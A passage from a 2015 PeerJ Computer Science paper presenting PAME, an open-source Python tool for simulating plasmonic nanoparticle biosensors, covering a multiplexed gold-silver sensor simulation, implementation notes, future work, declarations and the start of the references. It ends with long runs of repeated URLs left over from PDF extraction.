functionalized with anti-apoE, the antibody to an overexpressed gastric cancer biomarker, apoE. The silver colloids were functionalized with a non-specific antibody. The authors showed that the plasmon resonance peak of the gold particles shifted appreciably in response to apoE, while the silver did not. Furthermore, the gold peak did not respond to CLU, an underexpressed gastric cancer biomarker while the uncoated silver particles did, presumably due to non-specific binding. In effect, the multiplexed sensor provides a built-in negative control and can identify specific events more robustly. The ability to multiplex two or more colloids to a single sensor has great potential. To gain insights into Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 12/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 7 Simulation of multiplexed biosensor response. Simulation of a multiplexed biosensor with a combined 80 nm gold and 60 nm silver nanoparticle layer. Simulated NeutrAvidin binding to AgNPs (A, C) while AuNPs are kept bare, and vice versa (B, D). The coverage is varied until 95% of the available sites are occupied (617 proteins per AuNP, 363 per AgNP). The reflectance normalized to zero coverage (Γo) is shown in (C, D). this system, the sensor’s response to a mid-sized protein like NeutrAvidin (60 kDa) was simulated8. To our knowledge, this is the first attempt at modeling a multiplexed dip sensor 8 The NeutrAvidin simulation is an idealization of Sciacca & Monro (2014)’s configuration, as it only considers a single protein layer rather than an antigen-antibody bilayer. containing two nanoparticle species. A dip sensor was configured in PAME, composed of a 2.5 nm thick layer of organosi- lanes9 and a 92 nm layer of mixed protein-coated nanoparticles in water. A 3-layer 9 Sciacca & Monro (2014) actually used a thick layer of PAH to bind the nanoparticles. It was unclear how best to model this material, so the organosilane layer from the previous example was used. The thickness of the PAH layer might explain why Sciacca & Monro (2014)’s silver reflectance is peaked at λmax ≈ 425 nm; whereas, our simulation and other reported silver nanoparticle films (Hutter & Fendler, 2002) exhibit maxima at λmax ≈ 405 nm. composite material model was used to represent the mixed nanoparticles. Materials 1 and 2 were set to 80 nm AuNPs and 60 nm AgNPs, respectively, using the dielectric functions described in Fig. 4; material 3 was set to water. Au–Au effects and Ag–Ag effects are taken into account, but PAME’s 2-phase EMTs cannot account for Au–Ag effects (3-phase and N-phase EMTs (Luo, 1997; Zhdanov, 2008) will be implemented in upcoming releases). Therefore, the combined layer, ñAuAg, is weighted in proportion to the fill fraction as, ñAuAg = φ1ñAu + φ2ñAg. Nanoparticle coverage was chosen so as to produce a large reflectance, with approximately equal contributions from gold and silver; the actual coverage used in Sciacca & Monro (2014) is not stated. Ultimately, 45.56% of the surface sites were covered in gold, and 18.64% in silver. NeutrAvidin was modeled as a 6 nm sphere (Tsortos et al., 2008) of dispersive refractive index, n ≈ 1.5 (Sarid & Challener, 2010), filling a 6 nm-wide shell on the nanoparticles from 0 to 95% coverage (617 proteins per AuNP and 363 per AgNP), as shown in Fig. 7. Despite using several approximations, the simulation provides many insights into multiplexed sensors. First, the 60 nm AgNPs reflect much more efficiently, despite AgNPs Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 13/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 and AuNPs having nearly identical extinction cross sections (Fig. 4). This is because silver particles are more efficient scatterers (Lee & El-Sayed, 2006), and reflectance depends exponentially on scattering cross section (Quinten, 2011). Therefore, reflectance sensors composed of highly-scattering particles can utilize sparse nanoparticle films, which are less susceptible to aggregation (Scarpettini & Bragas, 2010) and electrostatic and avidity effects. Secondly, the normalized response to protein binding is about 0.08 units for silver, and 0.06 for gold; however, there are 2.33 more proteins on gold than silver. Therefore, considering the response per molecule, 60 nm silver spheres are 3.12 time more sensitive to protein binding than 80 nm gold spheres. Experiments have confirmed similar three-fold enhancement to protein-induced plasmon resonance shifts in aqueous solutions of AuNPs and AgNPs (Sun & Xia, 2002; Mayer, Hafner & Antigen, 2011). This suggests a correspondence between shifts measured in free solution and the reflectance in optical fibers, despite little similarity in the qualitative profile of the response. Nusz et al. (2009) has suggested a figure of merit to objectively compare shifts vs. intensity responses. Finally, if response is partitioned into two spectral regions, such that 385 nm < λ ≤ 500 nm corresponds to silver, and λ ≥ 500 nm to gold, then Fig. 7 illuminates an important result: despite a clear separation in the peaks of the reflectance spectra, the response to NeutrAvidin spans both partitions. For example, in Fig. 7C the gold region (λ ≥ 550 nm) clearly responds to proteins binding to silver nanoparticles. This could lead to misinterpretations; for example, the response at λ ≈ 570 nm could be misattributed to non-specific binding onto gold, when in fact there is only binding to silver. In Sciacca & Monro (2014), both the gold and silver spectral regions responded to apoE, when only gold is coated with anti-apoE. While the signal in the silver region could be due to non-specific interactions between the anti-apoE and AgNPs, these simulations show that it could simply be due to spectral overlap in the gold and silver response, the extent of which depends on the dielectric function of the protein, the Au–Ag coupling and other factors. IMPLEMENTATION AND PERFORMANCE PAME’s graphical interface and event-handling framework is built on the Enthought Tool Suite, especially Traits and TraitsUI. Traits is particularly useful for rapid application development (Varoquaux, 2010). TraitsUI leverages either PyQT, Pyside or WxPython on the backend to generate the graphical interface. Some discrepancies in the user interface may be encountered between different backends, and possibly between operating systems. PAME has been tested on Ubuntu, OSX and Windows 7. A future refactor to supplant TraitsUI with Enaml (NucleicDevelopmentTeam, 2013) should resolve view inconsistencies. To enhance speed, PAME utilizes Numpy (Oliphant, 2007) and Pandas to vectorize most of its computations. Complex structures such as multilayers of 20 or more materials, with over a thousand datapoints per sample, are reasonably handled on a low-end laptop (IntelTM Core 2 Duo, 4GB DDR2 RAM). The intended operating conditions for PAME are stacks of less than 10 layers, and dispersive media of 100 or fewer datapoints. At present, the main performance bottleneck is redundant event triggering. Because PAME is highly interactive, changing a global parameter such as the working spectral range will trigger Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 14/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 updates in every material in the multilayer stack. For nanoparticles, this means the core, medium and possibly shell materials are all recomputed, each of which triggers a separate recalculation and redraw of the Mie-scattering cross sections. Streamlining global event handlers should yield appreciable performance gains, followed by additional vectorization of the TMM calculation, and finally implementing calculations that cannot be vectorized in Cython (Behnel et al., 2010). FUTURE IMPROVEMENTS Currently, PAME’s nanoparticle support is limited to nanospheres and core–shell particles because analytical solutions to these systems exist, and because many effective medium approximations are implemented with spheres in mind. The electromagnetic properties of nanoparticles of arbitrary morphology can be solved with numerical methods such as DDA, FDTD, or BEM, and libraries like MNPBEM implement common particle mor- phologies out-of-the-box. The recently released PyGBe (Cooper, Bardhan & Barba, 2014) library brings this potential to Python. PyGBe has been used to simulate protein interac- tions near the surface of materials (Lin, Liu & Wang, 2015), meaning it has the potential to supplant the current geometrical fill models used to describe protein-nanoparticle interactions. By analyzing interactions in the near-field with PyGBe and in the far-field with PAME, comprehensive insights into nanoparticle systems may be obtained. Even if exotic nanoparticle are incorporated into PAME, they would still need to be homogenized through an effective mixing theory to fit the TMM multilayer model. While classical EMTs can account for non-spherical inclusions through a dipole polarizability parameter (Garcıa, Llopis & Paje, 1999; Quinten, 2011), modern two-material EMTs derived from spectral density theory (Bergman, 1978; Sancho-Parramon, 2011; Lans, 2013), N-material generalized tensor formulations (Habashy & Abubakar, 2007; Zhdanov, 2008), and multipole treatments (Malasi, Kalyanaraman & Garcia, 2014) give better descriptions of real films topologies, and will be incorporated into PAME in the near future. Some systems cannot be adequately described with EMTs, for example films composed of large, highly-scattering particles (Quinten, 2011). In such cases, is still possible to compute the reflectance of a film of a few hundred spheres through generalized Mie theory, which is a coherent superposition of the multipole moments of each particle, or for larger films using incoherent superposition methods (Elias & Elias, 2002; Quinten, 2011), but such approaches don’t readily interface to the multilayer model. Rigorous coupled-wave analysis (RCWA) may be a viable alternative, as it as it incorporates periodic dielectric structures (Moharam et al., 1995) directly into TMM calculations, and is already imple- mented in Python (Rathgen, 2008; Francis, 2014). RCWA could be integrated into PAME without major refactoring, and has already been demonstrated as a viable alternative to EMTs in describing nanoparticle-embedded films in biosensors (Wu & Wang, 2009). CONCLUSION Plasmonic biosensing offers a promising alternative to conventional label-free protein detection techniques like enzyme-linked immunosorbent assays (ELISA) and Western blots, but dedicated software tools for the common sensor geometries are not readily Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 15/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 accessible. PAME fills the gap by providing an open-source tool which combines aspects of thin-film design, effective medium theories, and nanoscience to provide a modeling environment for biosensing. In this work, it has been shown that PAME can simulate a refractometer made from a dip sensor of AuNPs, and experimental data shows good agreement without invoking extensive fit parameters. Furthermore, PAME is flexible enough to reproduce results on new multiplexed sensor designs like those proposed by Lin et al. (2012) and Sciacca & Monro (2014). As plasmonic biosensors continue to develop, PAME should prove a useful tool for characterizing sensor response, a necessary step towards in-situ studies. ABOUT PAME documentation, source code, examples and video tutorials are hosted at: https:// github.com/hugadams/PAME. We are looking for developers to help extend the project. Please contact if interested. Programming Language: Python 2.7 License: 3-Clause BSD Version: 0.3.2 Dependencies: Enthought Tool Suite, Pandas, scipy (IPython ≥ 2.0 or greater and scikit-spectra recommended) OS: Windows, Mac and Linux Persistent Identifier: DOI 10.5281/zenodo.17578 Binary Installers: Under development ACKNOWLEDGEMENTS We’d like to thank Robert Kern and Jonathan March for many helpful discussions on Traits and TraitsUI, and Rayhaan Rasheed for helping to create the illustrations. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported in part by the George Gamow Research Fellowship, Luther Rice Collaborative Research fellowship programs, the George Washington University (GWU) Knox fellowship and the GWU Presidential Merit Fellowship. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: George Gamow Research Fellowship. Luther Rice Collaborative Research Fellowship. George Washington University Knox Fellowship. GWU Presidential Merit Fellowship. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 16/23 https://peerj.com/computer-science/ https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.7717/peerj-cs.17 Competing Interests The authors declare there are no competing interests. Author Contributions • Adam Hughes analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Zhaowen Liu analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • Mark E. Reeves wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding the deposition of related data: Source code is hosted on github: https://github.com/hugadams/PAME PAME v. 0.3.2 is archived on Zenodo DOI 10.5281/zenodo.17578 REFERENCES Amendola V, Meneghetti M. 2009. Size evaluation of gold nanoparticles by UV—vis spectroscopy. Journal of Physical Chemistry C 113:4277–4285 DOI 10.1021/jp8082425. Anker JN, Hall WP, Lyandres O, Shah NC, Zhao J, Duyne RPV. 2008. Biosensing with plasmonic nanosensors. Nature Publishing Group 7(June):8–10. Attana. 2014. Immobilization of antibodies on the Attana R⃝ carboxyl sensor chip surface. Technical Report. Available at http://www.attana.com/wp-content/uploads/2013/02/ TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf. Barrow SJ, Wei X, Baldauf JS, Funston AM, Mulvaney P. 2012. The surface plasmon modes of self-assembled gold nanocrystals. Nature Communications 3:1275 DOI 10.1038/ncomms2289. Battie Y, Resano-Garcia A, Chaoui N, En Naciri A. 2014. Optical properties of plasmonic nanoparticles distributed in size determined from a modified Maxwell–Garnett-Mie theory. Physica Status Solidi (C) 5:142–146 DOI 10.1002/pssc.201400190. Behnel S, Bradhaw R, Dalcı́n L, Florisson M, Makarov V, Seljebotn DS. 2010. Cython: C extensions for Python. Available at http://cython.org. Bergman DJ. 1978. The dielectric constant of a composite material in classical physics. Physics Reports C 9(9):377–407 DOI 10.1016/0370-1573(78)90009-1. Bhatia SC, Tripathi N, Dubey GP. 2002. Refractive indices of binary liquid mixtures of (decane + benzene) and (hexadecdane + benzene, or +hexane) at 303.15, 308.15 and 313.15 K. Indian Journal of Chemistry 41A:266–269. Bohren H. 1983. Absorption and scattering of light by small particles. Hoboken: John Wiley & Sons, Inc. Bossa J, Isokoski K, Paardekooper DM, Bonnin M, Linden EPVD, Triemstra T, Cazaux S. 2014. Porosity measurements of interstellar ice mixtures using optical laser interference and extended effective medium approximations. Astronomy and Astrophysics 136:1–8 DOI 10.1051/0004-6361/201322549. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 17/23 https://peerj.com/computer-science/ https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME https://github.com/hugadams/PAME http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.5281/zenodo.17578 http://dx.doi.org/10.1021/jp8082425 http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf http://www.attana.com/wp-content/uploads/2013/02/TN03-01-Immobilization-of-Antibodies-on-the-Attana-Carboxyl-Sensor-Chip-Surface.pdf 